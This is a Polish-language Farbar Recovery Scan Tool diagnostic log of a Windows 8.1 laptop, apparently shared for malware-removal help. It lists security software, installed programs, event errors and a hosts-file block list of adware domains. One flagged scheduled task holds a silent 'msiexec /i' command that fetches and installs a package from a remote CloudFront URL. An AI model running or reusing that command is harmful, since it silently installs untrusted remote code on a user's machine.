Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 24-05-2017 Uruchomiony przez rekkis (26-05-2017 07:50:04) Uruchomiony z C:\Users\rekkis\Downloads Microsoft Windows 8.1 z usługą Bing (Update) (X86) (2017-05-25 08:45:47) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-137526994-970686790-3836505406-500 - Administrator - Disabled) Gość (S-1-5-21-137526994-970686790-3836505406-501 - Limited - Disabled) rekkis (S-1-5-21-137526994-970686790-3836505406-1001 - Administrator - Enabled) => C:\Users\rekkis ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Kaspersky Total Security (Enabled - Up to date) {86367591-4BE4-AE08-2FD9-7FCB8259CD98} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Kaspersky Total Security (Enabled - Up to date) {3D579475-6DDE-A186-1569-44B9F9DE8725} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Kaspersky Total Security (Enabled) {BE0DF4B4-018B-AF50-0486-D6FE7C8A8AE3} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 17.00 beta (HKLM\...\7-Zip) (Version: 17.00 beta - Igor Pavlov) CardioChip Driver (HKLM\...\{9FDEE6FB-97E8-4933-BB8A-3C2908C81007}) (Version: 1.00.0000 - NeuroSky) CCleaner (HKLM\...\CCleaner) (Version: 5.30 - Piriform) Free Window Registry Repair (HKLM\...\Free Window Registry Repair) (Version: - ) Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1054 - Intel Corporation) Kaspersky Secure Connection (HKLM\...\InstallWIX_{1CF84962-50F8-48CA-9082-B70F3A02C686}) (Version: 17.0.0.611 - Kaspersky Lab) Kaspersky Secure Connection (Version: 17.0.0.611 - Kaspersky Lab) Hidden Kaspersky Total Security (HKLM\...\InstallWIX_{E27B1D7B-3B34-43A2-9FC0-9828D5DF46E2}) (Version: 17.0.0.611 - Kaspersky Lab) Kaspersky Total Security (Version: 17.0.0.611 - Kaspersky Lab) Hidden Kerish Doctor 2017 (HKLM\...\{EF70A54F-E09E-4570-8F21-C7674CDDB5B6}_is1) (Version: 4.65 - Kerish Products) Lenovo Yoga Mode Control (HKLM\...\{3F2E25D6-49D3-45D5-A7BD-13F5D6F64171}_is1) (Version: 2.0.0.9 - Lenovo) Malwarebytes (wersja 3.1.2.1733) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes) Mozilla Firefox 53.0.3 (x86 pl) (HKLM\...\Mozilla Firefox 53.0.3 (x86 pl)) (Version: 53.0.3 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla) Windows Driver Package - NeuroSky (SpbTestTool) Sample (11/01/2013 14.43.22.383) (HKLM\...\C70089FAF5F53973D209C25E8B49BEB9F19FEFCF) (Version: 11/01/2013 14.43.22.383 - NeuroSky) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-137526994-970686790-3836505406-1001_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll => Brak pliku ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0EA7836E-9169-4100-B5DA-E6B01BF3265F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Fauphhawick => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_198264_62260BF2&d=20170525 /q <==== UWAGA Task: {1C1CAEAC-BE40-4576-A2D1-4584101EF5BA} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-05-19] (Piriform Ltd) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2016-06-28 00:19 - 2016-06-28 00:19 - 00865232 _____ () C:\Program Files\Kaspersky Lab\Kaspersky Total Security 17.0.0\kpcengine.2.3.dll 2017-05-25 15:46 - 2017-05-09 16:38 - 01728456 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaiospi.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2013-08-22 08:13 - 2017-05-25 15:11 - 00001711 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 wemsofts.com 127.0.0.1 bongadoom.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 internalcampaigntargets.com 127.0.0.1 bigpicturepop.com 127.0.0.1 wizzcaster.com 127.0.0.1 bestoffersfortoday.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 agent.wizztrakys.com 127.0.0.1 csdimonetize.com 127.0.0.1 dl.azalee.site 127.0.0.1 titiaredh.com 127.0.0.1 wepcdisplaysystem.com 127.0.0.1 wepcanalyticsystem.com 127.0.0.1 healthydownload.com 127.0.0.1 leading2download.com 127.0.0.1 dwl0.wizzlabs.com 127.0.0.1 dwl1.wizzlabs.com 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 plugpackdownload.net 127.0.0.1 dscdn.pw 127.0.0.1 beautifllink.xyz ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-137526994-970686790-3836505406-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\rekkis\Desktop\14962789_1521701327845071_3047691754620263677_n.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja wyłączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{02187AEC-C003-4134-B421-05CB224C97CA}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{641514BB-2217-4E8E-8F77-F091ED4FEE01}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe ==================== Punkty Przywracania systemu ========================= 25-05-2017 10:53:49 Instalator modułów systemu Windows ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/26/2017 07:41:26 AM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/26/2017 07:29:58 AM) (Source: Software Protection Platform Service) (EventID: 8208) (User: ) Description: Pozyskiwanie oryginalnego biletu (hr=0xC004C4A5) dla szablonu o identyfikatorze {99c92734-d682-4d71-983e-d6ec3f16059f} nie powiodło się. Error: (05/26/2017 07:26:43 AM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 06:14:15 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 06:00:10 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 05:15:34 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 05:01:06 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 04:05:25 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 03:53:02 PM) (Source: DptfPolicyLpmService) (EventID: 1) (User: ) Description: Event-ID 1 Error: (05/25/2017 03:29:29 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0x8007267C Argumenty wiersza polecenia: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=e9942b32-2e55-4197-b0bd-5ff58cba8860;NotificationInterval=1440;Trigger=TimerEvent Dziennik System: ============= Error: (05/26/2017 07:40:47 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Kaspersky Secure Connection 1.0.0 z powodu następującego błędu: Potok został zakończony. Error: (05/26/2017 07:40:37 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Usługa Kaspersky Secure Connection 1.0.0 niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/26/2017 07:40:37 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Dynamic Application Loader Host Interface niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/26/2017 07:40:37 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Windows Search niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/26/2017 07:40:37 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa ymc niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/26/2017 07:40:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Intel(R) Capability Licensing Service Interface niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/26/2017 07:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Dynamic Platform & Thermal Framework Low Power Mode Service Application niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/26/2017 07:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Dynamic Platform & Thermal Framework Critical Service Application niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/26/2017 07:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Dynamic Platform & Thermal Framework Processor Participant Service Application niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/26/2017 07:40:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Bufor wydruku niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Atom(TM) CPU Z3745 @ 1.33GHz Procent pamięci w użyciu: 57% Całkowita pamięć fizyczna: 1944.11 MB Dostępna pamięć fizyczna: 831.33 MB Całkowita pamięć wirtualna: 3928.11 MB Dostępna pamięć wirtualna: 2641.27 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:56.49 GB) (Free:42.23 GB) NTFS Drive e: (MEDIA) (Removable) (Total:7.2 GB) (Free:7.2 GB) FAT32 ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (Size: 58.2 GB) (Disk ID: 35F62D63) Partition: GPT. ======================================================== Disk: 1 (Size: 7.2 GB) (Disk ID: 00000000) Partition: GPT. ==================== Koniec Addition.txt ============================